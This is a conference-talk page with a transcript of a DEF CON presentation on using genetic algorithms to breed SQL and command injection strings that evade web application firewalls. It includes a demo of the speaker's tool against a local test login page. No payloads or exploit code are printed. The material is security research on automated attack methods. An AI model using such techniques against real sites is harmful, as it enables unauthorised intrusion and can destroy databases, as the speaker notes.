We're sorry but this page doesn't work properly without JavaScript enabled. Please enable it to continue.
Feedback

Evolving Exploits Through Genetic Algorithms

00:00

Formale Metadaten

Titel
Evolving Exploits Through Genetic Algorithms
Serientitel
Anzahl der Teile
112
Autor
Lizenz
CC-Namensnennung 3.0 Unported:
Sie dürfen das Werk bzw. den Inhalt zu jedem legalen Zweck nutzen, verändern und in unveränderter oder veränderter Form vervielfältigen, verbreiten und öffentlich zugänglich machen, sofern Sie den Namen des Autors/Rechteinhabers in der von ihm festgelegten Weise nennen.
Identifikatoren
Herausgeber
Erscheinungsjahr
Sprache

Inhaltliche Metadaten

Fachgebiet
Genre
Abstract
This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning & evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections, let genetic algorithms take over and create lethal exploits to PWN sites for you! soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As member of the team, he has participated and won Open Capture the Flag DC 16, 18, and 19. Soen also participated in the DDTEK competition in DEF CON 20. 0xSOEN@blogspot.com
23
65
108
AlgorithmusComputervirusProgrammiergerätComputerSoftwaretestSommerzeitExplosion <Stochastik>CodeZählenSoftwareentwicklerElektronische UnterschriftEindeutigkeitp-BlockFirewallFlächentheorieInjektivitätOrakel <Informatik>Natürliche SpracheAlgorithmusBelegleserInjektivitätMittelwertFirewallWeb SiteResultanteSoftwareentwicklerZahlenbereichCodePhysikalisches SystemBasis <Mathematik>SoftwaretestVerkehrsinformationMultiplikationsoperatorFundamentalsatz der AlgebraSommerzeitMAPFortsetzung <Mathematik>Prozess <Informatik>Weg <Topologie>Grundsätze ordnungsmäßiger DatenverarbeitungWurm <Informatik>ComputervirusMetropolitan area networkServerFlächeninhaltSoftwareDifferenteEvoluteBenutzerbeteiligungInformatikWeb-ApplikationSichtenkonzeptÜberlagerung <Mathematik>ÄhnlichkeitsgeometrieApp <Programm>KinematikInverser LimesEinsProgrammiergerätMechanismus-Design-TheorieStrömungsrichtungTaskElektronische UnterschriftParametersystemDienst <Informatik>PortscannerNeuroinformatikVorlesung/KonferenzComputeranimation
ExploitZeitabhängigkeitFunktion <Mathematik>ZeichenketteDatensichtgerätAlgorithmusServerExogene VariableParametersystemFitnessfunktionInformationFehlermeldungSchreiben <Datenverarbeitung>Natürliche SpracheEvoluteProgrammiergerätArithmetische FolgeZeichenketteLoopInjektivitätSchnittmengeAlgorithmusVektorpotenzialZahlenbereichPseudozufallszahlenFitnessfunktionSensitivitätsanalysePhysikalischer EffektFortsetzung <Mathematik>CASE <Informatik>Quick-SortExogene VariableRechenbuchParametersystemServerProzess <Informatik>App <Programm>Güte der AnpassungFehlermeldungInformationEinsElektronische UnterschriftVorlesung/KonferenzComputeranimation
ImplementierungZeichenketteBitrateVariableOperations ResearchPermutationStatistikPaarvergleichInjektivitätFitnessfunktionNichtlinearer OperatorBitrateZeichenketteProzess <Informatik>Grundsätze ordnungsmäßiger DatenverarbeitungDemo <Programm>InjektivitätRandomisierungZahlenbereichMultiplikationsoperatorMechanismus-Design-TheorieInformationServerImplementierungStatistikTotal <Mathematik>SoftwarePunktBenutzerbeteiligungRohdatenCulling <Computergraphik>Einfache GenauigkeitAlgorithmusDoS-AttackeFunktionalVariableNatürliche SpracheVererbungshierarchieDickeEvoluteSiedepunktGüte der AnpassungDomain <Netzwerk>Cross over <Kritisches Phänomen>MereologieKinematikSystemaufrufFortsetzung <Mathematik>QuadratzahlHidden-Markov-ModellBitVirtuelle MaschineMAPComputeranimationVorlesung/Konferenz
Rechter Winkel
TypentheorieBildschirmmaskeEin-AusgabeGenerizitätSoftwareschwachstelleInjektivitätFlächeninhaltWeb-ApplikationEvoluteLoginPunktFortsetzung <Mathematik>Computeranimation
SichtenkonzeptLesezeichen <Internet>EvoluteVorlesung/KonferenzComputeranimation
SoftwareschwachstelleRechter WinkelAdressraumSystemverwaltungFortsetzung <Mathematik>CASE <Informatik>BenutzerbeteiligungMailing-ListeWeb SiteFlächeninhaltKonfiguration <Informatik>Generator <Informatik>ZahlenbereichVollständigkeitVariableSystemzusammenbruchServerExogene VariableZeichenketteDatenbankWeb-SeiteSyntaktische AnalyseAutomatische IndexierungValiditätRandomisierungComputeranimation
DatenbankVektorpotenzialProzess <Informatik>QuellcodeGlobale OptimierungAnalysisZeitabhängigkeitBefehlsprozessorCodeStrom <Mathematik>Fortsetzung <Mathematik>Elektronische UnterschriftVollständigkeitFestplatteGüte der AnpassungQuaderSoftwareTeilbarkeitMultiplikationsoperatorBenutzerbeteiligungQuellcodeDatenbankBitrateSoftwareentwicklerServerAlgorithmusBefehlsprozessorInjektivitätCodeBlackboxNatürliche SpracheZweiKontrollstrukturProgrammierungDifferenzkernProzess <Informatik>ComputersicherheitEinsAnalysisDebuggingProgrammierumgebungVektorpotenzialExogene VariableNetzbetriebssystemWeb-ApplikationSoftwaretestRechter WinkelSchlussregelComputeranimationVorlesung/Konferenz
ZeitabhängigkeitFitnessfunktionInklusion <Mathematik>KraftInformationComputeranimation
Transkript: Englisch(automatisch erzeugt)
All right. I guess we'll get started. Hi, everyone. My name is Sowen, and I'm talking about evolving exploits through genetic algorithms. So before I jump into genetic algorithms, though, I want to just give you a little backover of who I am. I've been on for many years. I do programming. I love viruses, worms, and I've been trained
as a computer scientist, and I do penetration testing in the daylight hours. But, you know, I'm still a noob. But this talk was focused mainly off of kind of my computer science interests and my job and my inner laziness wanting to come out, and I was looking at
my job, and I go, what I do on a day-to-day basis is I exploit web applications, and there's a number of problems associated with, you know, performing this task, and the major ones are it is driven by the customer, so you have to provide them what
they want. There's a small scope. You're only allowed to hit a tiny portion of the site, so you have to have a scalpel-like efficiency. You can't hit the whole web server with a hammer. You only have a limited amount of time, usually very short, as in a day, two days, three days, and it's all report-driven because it's
based off of giving a report to the customer. And so these problems were what has been driving me to look into this area, and there's a number of ways that I approached trying to solve these problems, and my methodology was usually run as many scanning tools as possible against a web application and then manually look at the areas that, you know,
come up as suspicious, and from there, if it does turn out to be exploitable, I write and exploit for it. But there's a couple problems inherent with that approach because the code coverage is inherently small because I'm trying to limit the amount of code that I view
on a day-to-day basis. So I want to have myself view less code and make sure that the code that I'm viewing is actually potentially vulnerable instead of just what have you. And also the inspection of suspicious areas that are discovered by, say, web scanners or
manually testing is also time costly as well. And then additionally, the development of a working exploit for a site takes time as well because there might be additional blocking
mechanisms in place, like a WAF, a Web Application Firewall, which you can see you have SQL injection, but all of a sudden you don't really have SQL injection because there's an additional layer you have to break through. And there's a number of really good tools out there for exploit discovery and development, and I use Acunetix, ZAP, and SQL Map very
frequently, and they're all fantastic tools. But I realized running some of the other tools like Nessus, Nmap, other scanning tools, that there's this problem, there's this very
similarity, there's this very big similarity with an existing industry, and it's a fundamental problem with web application scanners, as we know it today. So...
What up, bitches? It's funny. He thought you were clapping for him. He's like, well, I, you know, said SQL Map. What? Okay. All right, you know why we're here? Wow, this is the first time I have... There you go. That's what I'm talking about. At the very back, in the
gray. No, in the hoodie, man. Bring your skittles up here. Oh, what is this called? Thank you. Oh my god. That was awesome. The price is right. You are here. All right.
Thank you, sir. Wait, what's your name? Connor. Connor! Connor represents all of you who are first timers. And... Defcon. So, foundational problems with current
techniques. Sorry, that's all I knew. I think he was talking about scanning. Oh,
scanning. Scanning and software and stuff. Oh my god, look, he's got a countdown timer. Yep. Oh shit, you only have five minutes to go, dude. Four minutes? Wow, that sucks. Oh my god. Well, thank you for the alcohol, I appreciate it. You're
welcome. So, back on track. The foundational problems that we have with web application scanners is that the current main technologies are built around a signature-based system. They have an understanding of what a potential exploit could look like. They throw it at
the web server, and then if they retrieve a favorable or unfavorable result, they mark it as a finding. And so... Okay. So, I thought, you know, hey, why not take genetic
algorithms and apply them to web applications? Why not take, you know, your average basic SQL injection and go from something that a web application firewall can easily protect against and a programmer can easily defend against to something that is more, more hard
to, uh, to stop? And so, uh, this whole process of evolution is, is something that was really fascinating to me, and so, uh, so for this talk, we're going to use genetic algorithms to make exploits for SQL injection, command injection, and, uh, our attack
services HTTP and HTTPS. So, uh, it's web-based parameters. And, uh, we're not going to cover anything else. There's, this, this could be applied to a number of different things, uh, another JSON, AJAX, what have you. But, uh, just for the scope of this talk, we're talking about SQLI and, uh, command injection. So, uh, the tool I wrote for this
talk is called forced evolution. Uh, and it takes this concept of, uh, I'm going to use genetics to write exploits for me, so I don't have to do it myself. It's, it's the
algorithm is essentially, uh, you create a large number of things, and in this case, they'll be exploit strings, and, uh, you look for a certain solution that these things will provide, and in this case, it will be an exploit. Uh, and then you score all the strings'
performance using some sort of vague, ambiguous fitness function. And this fitness function, in our case, uh, we'll get into that later, but there is a way of determining, okay, using numbers, this is a better injection string than the previous one. And, uh, so our, our algorithm here is we have this loop. While we haven't found the
solution, we score, we kill off all the low-performing strings, uh, we breed the strong-performing strings, the ones that are more efficient or they bypass or they exploit better, and then, uh, we also mutate the strings randomly. And then once we have found a correct exploit, we display it and show it. And so, uh, the tool, forced
evolution, does exactly this. We create a large number of pseudo-random strings, uh, that we are pulling upon the history of all previous, uh, well, all that I could find, uh, SQL injections and command injections, uh, and using them to influence the
population of creatures that we breed, so we're not, uh, losing evolutionary progress, we're progressing forward. Uh, so we're, we're, we create a large amount of strings and then we breed in what we know has worked in the past, but we use that just to influence the population, we don't actually say, okay, we have a set of
signatures, because then we're back to the original problem. Uh, and then, uh, it, it, we go through the exact same process as a generic, genetic algorithm. Uh, we send the string as a parameter value, either post or get, what have you, and then use the, uh, response from the server to determine the score. And this could be many things. So,
there, we, we have a, a good deal of granularity on how we can score a string. And then, you know, just like the rest, we cull, we breed, we mutate, and then, you know, when we find a string that exploits, successfully exploits an app, we display it. So, there's a number of things that we, we also need to talk about. Like,
what is this fitness function? Like, how do we define, is this string better than another string? And, uh, there's, there's a couple of things that we can look at and say, does it cause weird behavior? Uh, is this string reflected? There might be a potential for XSS in this. Uh, and does this string cause an error? And if so,
it, is our SQL injection or command injection displayed inside of that error? That, uh, also, does the exploit string cause, uh, goal data or sensitive data to be displayed so that we can see, oh, potentially this is, you know, a good exploit? So,
once we've, once we've found out what a, a creature's score is, then we breed the top scores and then we kill the, uh, the underperforming scores. And, uh, the majority of, well, I can't really say majority, but, uh, a good chunk of genetic algorithms use this
genome crossover. And this works really well in our domain because we have these variable length SQL injection strings that we need to breed against each other. And so, the, this breeding process consists of cutting each string in half and then mixing halves and then mutating them. And, uh, the current implementation that I have in the tool is, uh, two parents create, uh, four children and also survive
themselves. So, they pass on their genes and they also live to see another day until someone is better than them. Uh, now, for the next step, like, what, what do we mean by mutating strings? Or mutating our exploits? So, yeah, that, my whiskey, oof. Uh,
the mutation rate, uh, I found to be, uh, usually it's best to have it variable. Um, and there's, there's a number of operations that we can use, but it all boils down to three
essential operations. We have mutation, changing a single byte in a string. We have adding information and we also have removing information as well. So, it's, it's somewhat like, uh, natural evolution. And so, uh, say, say the example of the, uh, the pre-mutated string ABCDE or ABCD, uh, the mutations that have been applied to it are the X has been
pre-pended to the string, the B has been deleted and the D has been mutated to an F. So, hopefully that will give you some idea of what we're saying. We're not doing anything crazy. We're just picking a random part of the string and we're changing it a little way. So, uh, that's how we mutate the strings. Now, there's a couple things to
keep in mind as we go throughout because we have this algorithmic process of breeding, killing, breeding, killing. So, our, our population is going to vary, uh, and the mutation rate
versus search speed is very important because, uh, if we mutate too quickly, if we say every single part of the, every single attack string that we have is going to change, it's essentially throwing random data at the web server and it's really not efficient, it's not worth, it's not worth doing. It's, it's taking a bunch of dice, throwing it in the air and
hoping you get all sixes. So, uh, it has to be, uh, tuned down to a point where it is efficient search. Uh, and there's also the, uh, the string cull rate versus the repopulation speed. If you cull more than you breed, uh, your, the amount of strings in your population will decrease and vice versa. If you, uh, repopulate too quickly,
there'll be, like, rabbits and denial of service around the machine. So, uh, with these, with these things in mind, I went ahead and I compiled a couple statistics on, uh, the, uh, the leading edge tools and, uh, I did Acunetix BERP, ZAP, uh, the OWASP, ZAP, and
SQL map, as well as forced evolution. And this is, this is just the raw data, but I'll go through some charts to show you how it compares to them. Uh, the number of requests sent to server, uh, is, is a very significant amount. Uh, forced evolution sends on average maybe 10 to 30,000 requests to a server. So this is not exactly a, a stealth
attack tool, but, uh, we'll get into some of the, the pros later. Uh, and the time to exploit is usually dependent on network latency and so these, these will fluctuate a little bit, but, uh, forced evolution does perform well compared to some tools but not very well
at all to others. And, uh, the same for SQL injection. I also did the same statistics for SQL injection and, uh, the, the total number of requests for server decreases dramatically because SQL injection has a finer way of expressing, uh, the score
associated with the fitness function. The, there's, there's a better way and it's easier to score one string higher than another because you have more information to do so. And so it's naturally more efficient because it, it, it depends on that fitness function, that scoring mechanism to determine who lives or what string lives and what string dies. And so it reaches a solution faster. And the time to exploit as well, uh,
decreases proportionally. So, uh, hmm, with that, let's go ahead and try a demo. May the demo gods be gracious because this, this does, uh, depend on, uh, Python import random. So,
let's, let's hope everything works. There we go. Okay. Oh, this is terrible. I'm sorry. Okay, so we have a generic web application here with a login form. Uh, and, uh, it is
vulnerable to SQL injection as you can, I'll type in just some random characters and it doesn't, it doesn't bring back correct input and, uh, there's, there's also other problems with it as well. So, we know that a vulnerability there exists and we can
discover this vulnerability or this suspicious area like we talked about previously through other scanning tools. And, uh, now all we have to do is point, uh, forced evolution at it and we'll go ahead and exploit it for us. Let me see. My VMs all of a sudden
changed size. Sorry. There we go. Okay. So, and, uh, forced evolution will be up on
GitHub in about 15 minutes after the talk. So, the command line options, I'll shut my glasses, are, uh, we have a target and for this we'll just do local host. And we have an address of the vulnerable web page. So, in that case, that will be SQLI index dot PHP. And
then we also have the vulnerable variable, which, uh, I believe is password. So, although I believe both would work. And then the method, the method previously was displayed as post, er, I'm sorry, get, but, uh, the tool has, has both options. And then the
other variables we'll just include for completeness, we'll just include the, uh, the user name. Typo? I would be dangerous if I had my glasses. Okay. User name equals,
let's just say Defcon. And then we also have, uh, what, what will constitute a valid
exploit? So, in this case, we want to get to the administrative area of the site. And so we'll put in, uh, our goal text will be administrative, we'll just put admin. Because the tool will search any request or, or any response that it receives back, parse it and
then, uh, determine if it has that string in it. So, and on the right hand side, I have a tail of, uh, the current requests coming into the web server. So, as, as we start running the tool, that will jump up. All right. Wish me luck. Here we go. All
right. Right now, it has created a large number of strings. Uh, well, actually not that large. It's only about a thousand. But, uh, it's running them against the web server currently and it's scoring them based upon what the, the, uh, the response it
receives back. And it's taking the top performers and then it's breeding them. So, right now we're at generation two, three, nothing crashed. Okay. And because this is
based upon, uh, random, random strings, uh, sometimes the solution is found
extremely quickly and sometimes it's, it takes a while. But, uh, because of the influence of the, the previous database, uh, this, this will become much, much faster.
Break this back over to my side. So, the pros and cons of using genetic
algorithms, uh, the cons, they, there's a couple major ones. Uh, this is not a very stealthy attack tool. As you can see, this generates a large amount of requests to the web server and that's inherent in genetic algorithms as, as a whole. Uh, and there's a
small potential to inadvertently destroy the database and operating system. So, I wouldn't run this against, I wouldn't run this against, uh, yeah, a production environment. Job security? I don't know. Yeah, and, and, uh, it is a slower process to, uh, develop and test exploits, uh, at least from the front end. Because I'm sure
anyone in the audience, when they see that SQL injection, they, they brrrr, write it out. Uh, but, and see the program took, you know, 20, 30 seconds to do it. And genetic algorithms will always be suboptimal to source code analysis because there's, there's just more code coverage you can do. Uh, but the pros, the pros for genetic
algorithms and using these to create exploits are, are, are fantastic. They're, they're really cheap in CPU RAM and hard drive and human time. Uh, you can run that on a Raspberry Pi. Your only limiting feature or factor is the network speed. Like how far
away are you from the web server? Uh, and as far as my time goes, I can just turn it on and it runs. I, I don't look at it again. It's good. Uh, and I feel it has more complete code coverage than other black potch approaches because not only does it have the signatures that the other black box approaches have, it also isn't bound by a box
of thinking this is, or someone saying this is what we know a good SQL injection to be. It takes us to the solution. And so that, that, that takes us to the, yeah, right, right now this tool will break web applications in the future. Uh, it might not do it
efficiently, but as the, the database of, uh, SQL exploits grows, it will do it more efficiently. And, uh, the, another huge pro for this is automatic exploit development. Uh, the, I don't have to invest my time into sitting down and
figuring, oh, okay, I got SQLite. Oh, okay, there's WAF. Oh, okay, there's something else. Oh, okay, there's filtering rules. This doesn't need to know about those. It just cares about that question and response. And so, uh, it's, it's really fantastic in that regard. And, and, and the last biggest pro for this is emergent exploit discovery.
Because since this isn't bound by what we know as, okay, this is a valid exploit, this will create new things, new ways of approaching problems that we haven't seen yet. And for that reason, I think it's absolutely fantastic and I think we should pursue this. So, in conclusion, you can download the tool, give me, give me about 15 minutes. And, uh,
there's my contact info, so.